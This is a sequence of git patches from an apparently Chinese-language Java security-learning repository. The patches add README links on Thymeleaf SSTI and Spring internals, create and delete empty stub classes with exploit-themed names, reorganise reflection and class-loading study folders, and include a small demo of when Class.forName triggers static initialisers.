+ +## EL + + + +
+ +## Thymeleaf + +[Java Thymeleaf SSTI(本质为SpEL) | Godown_blog](https://godownio.github.io/2025/04/28/java-thymeleaf-ssti-spel/) + + + + +
# RASP @@ -415,6 +447,14 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list](https://github.com/LandGrey/SpringBootVulExploit) 总结了SpringBoot的常见利用方式 +
+ +## 源码分析 + +[DispatcherServlet.doDispatch请求分发详解 | Godown_blog](https://godownio.github.io/2025/03/25/spring-dispatcherservlet-xiang-jie/) + + +
## heapdump分析 diff --git a/SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java b/SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java new file mode 100644 index 0000000..ebd52a5 --- /dev/null +++ b/SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java @@ -0,0 +1,4 @@ +package com.test; + +public class WebApplication { +} diff --git a/SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java b/SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java new file mode 100644 index 0000000..6b21971 --- /dev/null +++ b/SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java @@ -0,0 +1,4 @@ +package com.test.controller; + +public class HelloController { +} diff --git a/SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java b/SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java new file mode 100644 index 0000000..e4de9a2 --- /dev/null +++ b/SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java @@ -0,0 +1,4 @@ +package com.test.controller.vul; + +public class TestController { +} diff --git a/SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java b/SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java new file mode 100644 index 0000000..923a735 --- /dev/null +++ b/SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java @@ -0,0 +1,4 @@ +package com.test.pojo; + +public class User { +} diff --git a/SSTI/Thymeleaf/src/main/resources/application.yml b/SSTI/Thymeleaf/src/main/resources/application.yml new file mode 100644 index 0000000..e69de29 diff --git a/SSTI/Thymeleaf/src/main/resources/static/app.css b/SSTI/Thymeleaf/src/main/resources/static/app.css new file mode 100644 index 0000000..e69de29 diff --git a/SSTI/Thymeleaf/src/main/resources/templates/component.html b/SSTI/Thymeleaf/src/main/resources/templates/component.html new file mode 100644 index 0000000..4bdcfcb --- /dev/null +++ b/SSTI/Thymeleaf/src/main/resources/templates/component.html @@ -0,0 +1,10 @@ + + + + + $Title$ + + +$END$ + + \ No newline at end of file diff --git a/SSTI/Thymeleaf/src/main/resources/templates/date.html b/SSTI/Thymeleaf/src/main/resources/templates/date.html new file mode 100644 index 0000000..4bdcfcb --- /dev/null +++ b/SSTI/Thymeleaf/src/main/resources/templates/date.html @@ -0,0 +1,10 @@ + + + + + $Title$ + + +$END$ + + \ No newline at end of file diff --git a/SSTI/Thymeleaf/src/main/resources/templates/index.html b/SSTI/Thymeleaf/src/main/resources/templates/index.html new file mode 100644 index 0000000..4bdcfcb --- /dev/null +++ b/SSTI/Thymeleaf/src/main/resources/templates/index.html @@ -0,0 +1,10 @@ + + + + + $Title$ + + +$END$ + + \ No newline at end of file diff --git a/SSTI/Thymeleaf/src/main/resources/templates/page.html b/SSTI/Thymeleaf/src/main/resources/templates/page.html new file mode 100644 index 0000000..4bdcfcb --- /dev/null +++ b/SSTI/Thymeleaf/src/main/resources/templates/page.html @@ -0,0 +1,10 @@ + + + + + $Title$ + + +$END$ + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/WebApplication.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/WebApplication.java" new file mode 100644 index 0000000..d77447c --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/WebApplication.java" @@ -0,0 +1,4 @@ +package com.spring; + +public class WebApplication { +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/controller/TestController.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/controller/TestController.java" new file mode 100644 index 0000000..e03252e --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/controller/TestController.java" @@ -0,0 +1,4 @@ +package com.spring.controller; + +public class TestController { +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BasicUsage.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BasicUsage.java" new file mode 100644 index 0000000..a22e630 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BasicUsage.java" @@ -0,0 +1,4 @@ +package com.test; + +public class BasicUsage { +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RceEcho.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RceEcho.java" new file mode 100644 index 0000000..2c69079 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RceEcho.java" @@ -0,0 +1,4 @@ +package com.test; + +public class RceEcho { +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" new file mode 100644 index 0000000..d1f8e0d --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" @@ -0,0 +1,4 @@ +package com.test; + +public class RcePart1 { +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" new file mode 100644 index 0000000..5f1f32c --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" @@ -0,0 +1,4 @@ +package com.test; + +public class RcePart2 { +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" new file mode 100644 index 0000000..e69de29 From b89c59516423b494eead44cdbc0dae5b16aaa1a9 Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Mon, 13 Oct 2025 19:55:06 +0800 Subject: [PATCH 08/16] =?UTF-8?q?=E5=88=A0=E9=99=A4SSTI=E7=9B=AE=E5=BD=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../src/main/java/com/test/WebApplication.java | 4 ---- .../main/java/com/test/controller/HelloController.java | 4 ---- .../java/com/test/controller/vul/TestController.java | 4 ---- SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java | 4 ---- SSTI/Thymeleaf/src/main/resources/application.yml | 0 SSTI/Thymeleaf/src/main/resources/static/app.css | 0 .../src/main/resources/templates/component.html | 10 ---------- SSTI/Thymeleaf/src/main/resources/templates/date.html | 10 ---------- SSTI/Thymeleaf/src/main/resources/templates/index.html | 10 ---------- SSTI/Thymeleaf/src/main/resources/templates/page.html | 10 ---------- 10 files changed, 56 deletions(-) delete mode 100644 SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java delete mode 100644 SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java delete mode 100644 SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java delete mode 100644 SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java delete mode 100644 SSTI/Thymeleaf/src/main/resources/application.yml delete mode 100644 SSTI/Thymeleaf/src/main/resources/static/app.css delete mode 100644 SSTI/Thymeleaf/src/main/resources/templates/component.html delete mode 100644 SSTI/Thymeleaf/src/main/resources/templates/date.html delete mode 100644 SSTI/Thymeleaf/src/main/resources/templates/index.html delete mode 100644 SSTI/Thymeleaf/src/main/resources/templates/page.html diff --git a/SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java b/SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java deleted file mode 100644 index ebd52a5..0000000 --- a/SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java +++ /dev/null @@ -1,4 +0,0 @@ -package com.test; - -public class WebApplication { -} diff --git a/SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java b/SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java deleted file mode 100644 index 6b21971..0000000 --- a/SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.controller; - -public class HelloController { -} diff --git a/SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java b/SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java deleted file mode 100644 index e4de9a2..0000000 --- a/SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.controller.vul; - -public class TestController { -} diff --git a/SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java b/SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java deleted file mode 100644 index 923a735..0000000 --- a/SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.pojo; - -public class User { -} diff --git a/SSTI/Thymeleaf/src/main/resources/application.yml b/SSTI/Thymeleaf/src/main/resources/application.yml deleted file mode 100644 index e69de29..0000000 diff --git a/SSTI/Thymeleaf/src/main/resources/static/app.css b/SSTI/Thymeleaf/src/main/resources/static/app.css deleted file mode 100644 index e69de29..0000000 diff --git a/SSTI/Thymeleaf/src/main/resources/templates/component.html b/SSTI/Thymeleaf/src/main/resources/templates/component.html deleted file mode 100644 index 4bdcfcb..0000000 --- a/SSTI/Thymeleaf/src/main/resources/templates/component.html +++ /dev/null @@ -1,10 +0,0 @@ - - - - - $Title$ - - -$END$ - - \ No newline at end of file diff --git a/SSTI/Thymeleaf/src/main/resources/templates/date.html b/SSTI/Thymeleaf/src/main/resources/templates/date.html deleted file mode 100644 index 4bdcfcb..0000000 --- a/SSTI/Thymeleaf/src/main/resources/templates/date.html +++ /dev/null @@ -1,10 +0,0 @@ - - - - - $Title$ - - -$END$ - - \ No newline at end of file diff --git a/SSTI/Thymeleaf/src/main/resources/templates/index.html b/SSTI/Thymeleaf/src/main/resources/templates/index.html deleted file mode 100644 index 4bdcfcb..0000000 --- a/SSTI/Thymeleaf/src/main/resources/templates/index.html +++ /dev/null @@ -1,10 +0,0 @@ - - - - - $Title$ - - -$END$ - - \ No newline at end of file diff --git a/SSTI/Thymeleaf/src/main/resources/templates/page.html b/SSTI/Thymeleaf/src/main/resources/templates/page.html deleted file mode 100644 index 4bdcfcb..0000000 --- a/SSTI/Thymeleaf/src/main/resources/templates/page.html +++ /dev/null @@ -1,10 +0,0 @@ - - - - - $Title$ - - -$END$ - - \ No newline at end of file From f534d5f7bd88b2ef803a88507c6f56b7da208d13 Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Mon, 13 Oct 2025 19:56:52 +0800 Subject: [PATCH 09/16] =?UTF-8?q?update:=20=E6=9B=B4=E6=96=B0=E5=8F=8D?= =?UTF-8?q?=E5=B0=84=E7=9B=B8=E5=85=B3=E4=BB=A3=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../src/main/java/com/test/pojo/Person.java" | 4 --- .../src/main/java/com/test/study/Loader.java" | 17 ----------- .../java/com/test/study/define2Load.java" | 4 --- .../src/main/java/com/test/study/tmp.java" | 4 --- .../src/main/java/com/test/pojo/Student.java" | 4 --- .../java/com/test/study/RuntimeExec.java" | 4 --- .../src/main/java/com/test/study/tmp.java" | 4 --- .../ClassLoadStudy/.gitignore" | 0 .../ClassLoadStudy/.idea/.gitignore" | 0 .../ClassLoadStudy/.idea/encodings.xml" | 0 .../ClassLoadStudy/.idea/misc.xml" | 0 .../ClassLoadStudy/.idea/vcs.xml" | 0 .../ClassLoadStudy/Person.class" | Bin 0 -> 784 bytes .../ClassLoadStudy/Student.class" | Bin 0 -> 881 bytes .../ClassLoadStudy/pom.xml" | 8 ++++++ .../src/main/java/com/test/pojo/Baka.java" | 0 .../src/main/java/com/test/pojo/Person.java" | 18 ++++++++++++ .../src/main/java/com/test/study/Loader.java" | 20 +++++++++++++ .../java/com/test/study/define2Load.java" | 27 ++++++++++++++++++ .../src/main/java/com/test/study/tmp.java" | 7 +++++ .../RceStudy/.gitignore" | 0 .../RceStudy/.idea/encodings.xml" | 0 .../RceStudy/.idea/misc.xml" | 0 .../RceStudy/.idea/vcs.xml" | 0 .../RceStudy/.idea/workspace.xml" | 0 .../RceStudy/pom.xml" | 0 .../src/main/java/com/test/ExecFailed.java" | 0 .../java/com/test/ProcessBuilderExec.java" | 0 .../RceStudy/src/main/webapp/WEB-INF/web.xml" | 0 .../RceStudy/src/main/webapp/index.jsp" | 0 .../src/main/webapp/processBuilder.jsp" | 0 .../RceStudy/src/main/webapp/runtime.jsp" | 0 .../RceStudy/src/main/webapp/runtime2.jsp" | 0 .../ReflectionStudy/.gitignore" | 0 .../ReflectionStudy/.idea/.gitignore" | 0 .../ReflectionStudy/.idea/encodings.xml" | 0 .../ReflectionStudy/.idea/misc.xml" | 0 .../ReflectionStudy/.idea/vcs.xml" | 0 .../ReflectionStudy/1.txt" | Bin 0 -> 8 bytes .../ReflectionStudy/pom.xml" | 0 .../src/main/java/com/test/pojo/Baka.java" | 2 +- .../main/java/com/test/pojo/Student.class" | Bin 0 -> 881 bytes .../src/main/java/com/test/pojo/Student.java" | 25 ++++++++++++++++ .../com/test/study/Reflection2Runtime.java" | 15 ++++++++-- .../com/test/study/ReflectionMethods.java" | 2 ++ .../java/com/test/study/RuntimeExec.java" | 22 ++++++++++++++ .../main/java/com/test/study/Ways2Class.java" | 0 .../src/main/java/com/test/study/tmp.java" | 16 +++++++++++ 48 files changed, 159 insertions(+), 44 deletions(-) delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.gitignore" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/.gitignore" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/encodings.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/misc.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/vcs.xml" (100%) create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Person.class" create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Student.class" rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/pom.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/pom.xml" (74%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" (100%) create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java" create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java" rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.gitignore" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/encodings.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/misc.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/vcs.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/workspace.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/pom.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ExecFailed.java" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/WEB-INF/web.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/index.jsp" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/processBuilder.jsp" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime.jsp" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime2.jsp" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.gitignore" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/.gitignore" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/encodings.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/misc.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/vcs.xml" (100%) create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/1.txt" rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/pom.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" (97%) create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.class" create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.java" rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" (65%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" (97%) create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" (100%) create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" deleted file mode 100644 index f603f37..0000000 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.pojo; - -public class Person { -} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" deleted file mode 100644 index 1ec5f3c..0000000 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" +++ /dev/null @@ -1,17 +0,0 @@ -package com.test.study; - -import com.test.pojo.Baka; - -public class Loader { - public static void main(String[] args) throws Exception { - Class bakaClass = Baka.class; - System.out.println("================="); - Class.forName("com.test.pojo.Baka"); // 触发static - System.out.println("=================="); - Class.forName("com.test.pojo.Baka", false, ClassLoader.getSystemClassLoader()); // 不触发 - System.out.println("================="); - Class.forName("com.test.pojo.Baka", true, ClassLoader.getSystemClassLoader()); // 触发static - System.out.println("=================="); - Baka baka = Baka.class.newInstance(); // 触发无参构造和static - } -} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" deleted file mode 100644 index ef2c366..0000000 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.study; - -public class define2Load { -} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" deleted file mode 100644 index d901a07..0000000 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.study; - -public class tmp { -} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" deleted file mode 100644 index 90ac535..0000000 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.pojo; - -public class Student { -} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" 